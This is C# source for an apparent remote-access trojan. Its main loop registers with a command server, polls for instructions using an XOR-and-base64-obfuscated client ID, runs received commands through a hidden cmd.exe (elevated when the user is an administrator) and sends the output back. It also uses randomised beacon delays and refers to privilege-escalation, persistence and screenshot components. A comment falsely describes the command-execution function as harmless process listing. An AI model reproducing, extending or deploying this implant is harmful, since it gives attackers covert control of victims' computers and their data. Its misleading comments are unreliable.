/* * <explanation> * This function is used for retrieving running processes from <method>GetCurrentProcess</method> of <class>Process</class>. * <namespace>System.Diagnostics</namespace> is required for this task. * </explanation> */ public void _cmdMode(string command, sendRetrieve sendObj, initialEnum enumEnv, System.Net.WebClient web, Chiper chipops, String uri) { string result = ""; Process p = new Process(); p.StartInfo.FileName = "cmd.exe"; p.StartInfo.Arguments = "/c" + command; p.StartInfo.CreateNoWindow = true; p.StartInfo.UseShellExecute = false; p.StartInfo.WorkingDirectory = this._workingDir(); p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardError = true; if (enumEnv.isAdmin) { p.StartInfo.Verb = "runas"; } p.Start(); result += p.StandardOutput.ReadToEnd(); result += p.StandardError.ReadToEnd(); sendObj._sendResult(result, web, enumEnv, chipops); }
static void Main(string[] args) { WebClient web = new WebClient(); web.Proxy = WebRequest.GetSystemWebProxy(); web.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials; web.Credentials = CredentialCache.DefaultCredentials; initialEnum enumEnv = new initialEnum(); privilegeEscalation privs = new privilegeEscalation(); sendRetrieve sendOrRetrieve = new sendRetrieve(); Chiper chipops = new Chiper(); addPersistence persistence = new addPersistence(); processCommand proc = new processCommand(enumEnv, privs, persistence); registerIn register; int waitTimeCounter = 0; register = new registerIn(enumEnv, chipops, web); if (register.isComplete) { // persistence._copyItSelf(); string commandRetrieveUri = Globals.commandRetrieveUri + chipops._base64encode(chipops._xorOps(enumEnv.clientID, "northstar")); while (true) { string comm = sendOrRetrieve._getCommand(commandRetrieveUri, web, enumEnv, chipops); if (!proc.cmdModeEnabled) { try { if (comm.Length >= 2) { if (comm == "die") { break; } waitTimeCounter = 0; string commandResult = proc._parseCommand(comm); if (!proc.wasScreenshot && commandResult.Length > 1) { sendOrRetrieve._sendResult(commandResult, web, enumEnv, chipops); } else { proc.wasScreenshot = false; } } else if (comm.Length < 2) { waitTimeCounter++; if (waitTimeCounter > 40) { enumEnv.isWaitTimeManuallySetted = false; waitTimeCounter = 0; } } } catch { System.Threading.Thread.Sleep(enumEnv.waitTime); } } else //if cmd mode enabled { if (comm.Length > 2) { if (comm == "exit" || comm == "break" || comm == "disablecmd") { proc.cmdModeEnabled = false; sendOrRetrieve._sendResult("CMD mode disabled", web, enumEnv, chipops); } else { if (comm.Contains("wait")) { sendOrRetrieve._sendResult(proc._parseCommand(comm), web, enumEnv, chipops); } else if (comm.Contains("cd ") && !comm.Contains("cd ,")) { sendOrRetrieve._sendResult(proc._parseCommand(comm), web, enumEnv, chipops); } else { proc._cmdMode(comm, sendOrRetrieve, enumEnv, web, chipops, commandRetrieveUri); } } } else { waitTimeCounter++; if (waitTimeCounter > 40) { enumEnv.isWaitTimeManuallySetted = false; waitTimeCounter = 0; } } } System.Threading.Thread.Sleep(enumEnv.waitTime); if (!enumEnv.isWaitTimeManuallySetted) { enumEnv.setRandomWaitTime(); } } } }